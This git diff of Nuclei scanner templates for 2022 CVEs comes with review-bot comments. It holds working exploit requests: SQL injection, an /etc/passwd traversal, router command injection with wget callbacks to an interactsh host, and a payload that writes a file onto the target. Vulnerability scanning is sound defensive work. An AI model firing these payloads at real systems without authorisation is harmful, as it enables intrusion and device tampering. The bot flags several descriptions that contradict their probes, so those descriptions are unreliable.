diff --git a/nuclei-templates/CVE-2022/CVE-2022-24627.yaml b/nuclei-templates/CVE-2022/CVE-2022-24627.yaml index 71956dce37..251b1da63f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24627.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24627.yaml @@ -4,15 +4,41 @@ info: name: AudioCodes Device Manager Express - SQL Injection author: geeknik severity: critical - description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. + description: | + An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form. reference: - https://seclists.org/fulldisclosure/2023/Feb/12 - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 + - https://github.com/tr3ss/newclei classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-24627 - tags: cve,cve2022,sqli,audiocodes + cwe-id: CWE-89 + epss-score: 0.00109 + epss-percentile: 0.43163 + cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: audiocodes + product: device_manager_express + shodan-query: title:"Audiocodes" + tags: cve,cve2022,seclists,sqli,audiocodes + +flow: http(1) && http(2) http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "audiocodes")' + internal: true + - raw: - | POST /admin/AudioCodes_files/process_login.php HTTP/1.1 @@ -29,3 +55,4 @@ http: - "mysql_fetch" - "You have an error in your SQL syntax" condition: or +# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-2467.yaml b/nuclei-templates/CVE-2022/CVE-2022-2467.yaml index 175a0dee04..17675e9e2e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2467.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2467.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0. reference: - https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md - https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html 
@@ -15,25 +19,31 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2467 cwe-id: CWE-89 + epss-score: 0.01309 + epss-percentile: 0.8445 + cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli + verified: true + max-request: 1 + vendor: garage_management_system_project + product: garage_management_system + tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project -requests: +http: - raw: - | - @timeout: 10s + @timeout: 15s POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334 + username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334 matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - type: word part: body @@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 4b0a00483046022100ffddfa5138b805871ea2a646da2d928f9d7c7e4984d7b39c4337da59dc6ffee00221008bb7119b74e219c4da7ebc1abe7299068e74ab28eb036cb85ad8ccdf44bea154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml b/nuclei-templates/CVE-2022/CVE-2022-24681.yaml deleted file mode 100644 index cb02386823..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml +++ /dev/null 
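Review bot: The time-based payload and threshold move from 5 s to 7 s (`SLEEP(7)`, `duration>=7`, `@timeout: 15s`), but the `description` that is context in the first hunk of this file still quotes the `SLEEP(5)` input, so the documentation now disagrees with the request it describes; update the description to match or drop the literal payload from it. A single duration check with no baseline request still risks firing on hosts that are simply slow; the `status` and body-word matchers help, but an unmodified second request compared against the first would make the signal more robust. `verified: true` and the `requests:` to `http:` migration are consistent with the rest of the commit.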
@@ -1,51 +0,0 @@ -id: CVE-2022-24681 - -info: - name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting - author: Open-Sec - severity: medium - description: | - ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. - reference: - - https://raxis.com/blog/cve-2022-24681 - - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24681 - cwe-id: CWE-79 - tags: cve,cve2022,manageengine,xss,authenticated - -requests: - - raw: - - | - POST /servlet/GetProductVersion HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - part: body - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(buildnumber, '< 6121') - - - type: word - part: body - words: - - "ManageEngine" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24706.yaml b/nuclei-templates/CVE-2022/CVE-2022-24706.yaml index 583f7ac40b..0dc99a7dc2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24706.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24706.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: @@ -19,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 - epss-score: 0.97407 + epss-score: 0.9748 + epss-percentile: 0.99964 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +30,7 @@ info: vendor: apache product: couchdb shodan-query: product:"CouchDB" - tags: cve,cve2022,network,couch,rce,kev + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" @@ -36,8 +39,7 @@ variables: tcp: - host: - "{{Hostname}}" - port: 9100 - + - "{{Host}}:9100" inputs: # auth - data: "{{name_msg}}" @@ -59,3 +61,4 @@ tcp: - "gid" - "groups" condition: and +# digest: 490a004630440220602f1a063fe87341e5ec859e52c38e96493e433e56306a897672d3b25e1421050220331d04d26d8d1693385a3bbe00a72a748c82f4586857b7fdec165de6c7b7a4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24716.yaml b/nuclei-templates/CVE-2022/CVE-2022-24716.yaml index 9563effe7c..8ced979300 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24716.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24716.yaml 
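Review bot: `verified: "true"` remains a quoted string on the new side, while the same commit normalizes the field to a bare boolean `verified: true` in CVE-2022-24181 and CVE-2022-2467; use `verified: true` here too. The `impact` block claims arbitrary command execution, whereas the description says the attacker gains admin privileges on an unsecured default installation — the `rce` tag suggests the stronger claim is intended, but the two texts should agree. The host rewrite to `- "{{Host}}:9100"` targets the same port as the removed `host`/`port` pair, so behaviour looks unchanged.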
@@ -6,6 +6,8 @@ info: severity: high description: | Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data. remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. reference: - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py @@ -18,15 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 - epss-score: 0.22705 - epss-percentile: 0.96032 + epss-score: 0.25375 + epss-percentile: 0.96582 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: icinga product: icinga_web_2 shodan-query: title:"Icinga" - tags: packetstorm,cve,cve2023,icinga,lfi + tags: cve,cve2022,packetstorm,icinga,lfi http: - method: GET @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cf74196add4b438ad90afb356f9b2d29513b2686b73c07b21c99d5e21e27033102203ce4f678a2edb32f85d880b8579f3ba2d9ab4381d1c5411101f7d079c3569bb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24816.yaml b/nuclei-templates/CVE-2022/CVE-2022-24816.yaml index 11d8a8b33a..e1aa6c65e5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24816.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24816.yaml 
@@ -1,28 +1,38 @@ id: CVE-2022-24816 info: - name: Geoserver Server - Code Injection + name: GeoServer <1.2.2 - Remote Code Execution author: mukundbhuva severity: critical description: | - Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22. + Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. 
reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 + - https://github.com/tanjiti/sec_profile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 + epss-score: 0.86265 + epss-percentile: 0.98506 + cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: - fofa-query: app="GeoServer" + verified: true + max-request: 1 + vendor: geosolutionsgroup + product: jai-ext shodan-query: /geoserver/ - verified: "true" - tags: cve,cve2022,geoserver,rce + fofa-query: app="GeoServer" + tags: cve,cve2022,geoserver,rce,geosolutionsgroup -requests: +http: - raw: - | POST /geoserver/wms HTTP/1.1 @@ -71,3 +81,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450221008c43a89e6024f154e1c9ec73d2af5b54a9fe62ce9de2200c4c749d86d684bcac02206e61c587bb72efa57e89b3e5d7522186d366d6693a3fefd7dcf278d233235347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml index 867ca9a9d9..0bf893b39e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml 
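Review bot: The new `info` block gives three different version numbers for the same fix: the name says `GeoServer <1.2.2`, the description says "before 1.2.2 ... affects downstream GeoServer 1.1.22", and the remediation says "1.2.22 contains a patch". The linked GHSA advisory and the new `cpe` both point at the jai-ext library (jt-jiffle), whose releases are the 1.1.x series, so the pre-change wording "Version < 1.1.22" looks like the one that was right; the note "affects downstream GeoServer 1.1.22" also inverts the meaning by dropping the `<`. I would make the three lines agree, e.g. `name: GeoServer (jt-jiffle) <1.1.22 - Remote Code Execution`, `... affects downstream GeoServer builds that bundle jt-jiffle before 1.1.22.` and `remediation: jt-jiffle 1.1.22 contains a patch ...`, after confirming the exact fixed version against the advisory.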
@@ -1,42 +1,30 @@ id: CVE-2022-24856 - info: name: Flyte Console <0.52.0 - Server-Side Request Forgery author: pdteam severity: high description: | FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. - impact: | - An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks. - remediation: | - The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. reference: - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 - https://github.com/flyteorg/flyteconsole/pull/389 - https://hackerone.com/reports/1540906 - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 - - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709 + remediation: | + The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. 
classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - epss-score: 0.08397 - epss-percentile: 0.94255 - cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: flyte - product: flyte_console - tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte - -http: + tags: cve,cve2022,flyteconsole,ssrf,oss +requests: - method: GET path: - - "{{BaseURL}}/cors_proxy/https://oast.me/" - + - "{{BaseURL}}/cors_proxy/https://www.interact.sh" matchers: - type: word words: - "Interactsh Server" -# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml index bf397b6486..2c3533d673 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml 
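Review bot: The SSRF check now depends on a third party: the probe fetches `https://www.interact.sh` through the proxy and the only positive signal is the literal `Interactsh Server` in the body, so the result silently turns negative whenever that public host changes its landing page or the target cannot reach it, and a positive is indistinguishable from a cached or proxied copy. An out-of-band interaction is the stronger proof that the target itself made the request. The same hunk also replaces `http:` with the older `requests:` key and drops the `metadata`/`cpe`/`epss` fields, which looks like an older copy overwriting a newer one rather than an intended change — worth confirming before merging.

```yaml
http:
  - method: GET
    path:
      - "{{BaseURL}}/cors_proxy/http://{{interactsh-url}}"
    matchers:
      - type: word
        part: interactsh_protocol   # the target, not a public page, must generate the callback
        words:
          - "http"
```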
@@ -1,16 +1,14 @@ id: CVE-2022-2486 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Mesh.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - https://vuldb.com/?id.204537 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -20,22 +18,17 @@ info: shodan-query: http.title:"Wi-Fi APP Login" verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast - requests: - raw: - | - GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status status: - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml index 10b7510a7e..899076eb8b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml 
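Review bot: The request line was changed to `GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1`, but the description, the references and the CVE id on this template all describe command injection via the `key` argument of `/cgi-bin/mesh.cgi?page=upgrade`. The `touchlist_sync.cgi`/`IP` probe is, as far as the rest of this commit shows, the body of the CVE-2022-2488 template that is deleted further down, so a hit here would be reported under the wrong CVE and the actual mesh.cgi issue is no longer tested at all. I would restore the original request, `GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1`, and keep CVE-2022-2488 as its own template.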
+++ b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml @@ -1,39 +1,26 @@ id: CVE-2022-2487 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Nightled.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - https://vuldb.com/?id.204538 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97404 - epss-percentile: 0.99916 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" - -http: +requests: - raw: - | @timeout: 10s 
@@ -42,7 +29,6 @@ http: Content-Type: application/x-www-form-urlencoded page=night_led&start_hour=;{{cmd}}; - matchers-condition: and matchers: - type: word @@ -50,14 +36,7 @@ http: words: - "uid=" - "gid=" - - "nightStart" condition: and - - - type: word - words: - - text/html - - type: status status: - 200 -# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml deleted file mode 100644 index f4e04da2f6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml +++ /dev/null 
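Review bot: Dropping `- "nightStart"` from the `condition: and` word list and removing the `text/html` header matcher leaves the success criterion as "a 200 whose body contains `uid=` and `gid=`", which no longer ties the match to the nightled.cgi page at all — any page echoing those substrings would now count. Since the template already executes `id` on the device, the extra `nightStart` token cost nothing and is what distinguished a real injection response from coincidental text; I would put it back: `- "nightStart"`. The hunk also removes the `impact`/`remediation` text and the `cpe`/`epss` fields, so please confirm this is not an older revision overwriting the newer one.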
@@ -1,41 +0,0 @@ -id: CVE-2022-2488 - -info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection - author: For3stCo1d - severity: critical - description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 - - https://vuldb.com/?id.204539 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2488 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml b/nuclei-templates/CVE-2022/CVE-2022-24899.yaml deleted file mode 100644 index 9b8518686b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2022-24899 - -info: - name: Contao <4.13.3 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. - reference: - - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - remediation: As a workaround, users may disable canonical tags in the root page settings. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24899 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss,huntr - -requests: - - method: GET - path: - - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - '"Not authenticated"' - condition: and - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml index 5197c4d2ea..9f2945210d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml 
@@ -1,47 +1,33 @@ id: CVE-2022-24900 - info: name: Piano LED Visualizer 1.3 - Local File Inclusion author: 0x_Akoko severity: high description: | Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. - impact: | - An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. - remediation: | - Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. reference: - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - https://vuldb.com/?id.198714 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 + - https://www.cvedetails.com/cve/CVE-2022-24900/ - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2022-24900 - cwe-id: CWE-668,CWE-22 - epss-score: 0.00999 - epss-percentile: 0.81936 - cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: piano_led_visualizer_project - product: piano_led_visualizer - tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project - -http: + cwe-id: CWE-610 + tags: cve,cve2022,lfi,piano,iot,oss +requests: - method: GET path: - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 
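Review bot: The classification is changed from `cwe-id: CWE-668,CWE-22` to `cwe-id: CWE-610`, but the probe in this same hunk is a plain `../../../../../../../etc/passwd` traversal through the `value` parameter, which is the textbook CWE-22 case; CWE-610 is a broader parent category and makes the template less precise for anyone filtering on CWE. Unless NVD has actually reclassified it, I would keep `cwe-id: CWE-22`. The swap of the NVD reference for a cvedetails link and of `http:` for the older `requests:` key also reads like an older copy winning the merge.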
diff --git a/nuclei-templates/CVE-2022/CVE-2022-25082.yaml b/nuclei-templates/CVE-2022/CVE-2022-25082.yaml index d0cd95fd1a..5c748465de 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25082.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25082.yaml @@ -6,25 +6,35 @@ info: severity: critical description: | TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25082 - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25082 - cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot - + cwe-id: CWE-78 + epss-score: 0.0417 + epss-percentile: 0.92009 + cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: totolink + product: a950rg_firmware + tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive variables: cmd: "`ls>../{{randstr}}`" -requests: +http: - raw: - | GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1 Host: {{Hostname}} - - | GET /{{randstr}} HTTP/1.1 Host: {{Hostname}} 
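Review bot: The new `intrusive` tag is the right call, but nothing in the template says why: the `cmd` variable `` `ls>../{{randstr}}` `` writes a directory listing into the router's web root and the second request then fetches it, leaving that file on the device after the scan. Operators reading the template should not have to infer that from the payload, so I would add a comment above the `variables:` line: `# Intrusive: the payload writes ../{{randstr}} into the web root and does not remove it; clean up after testing`. If a cleanup request (e.g. `rm` via the same injection) is acceptable for this target class, it belongs in the same raw sequence.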
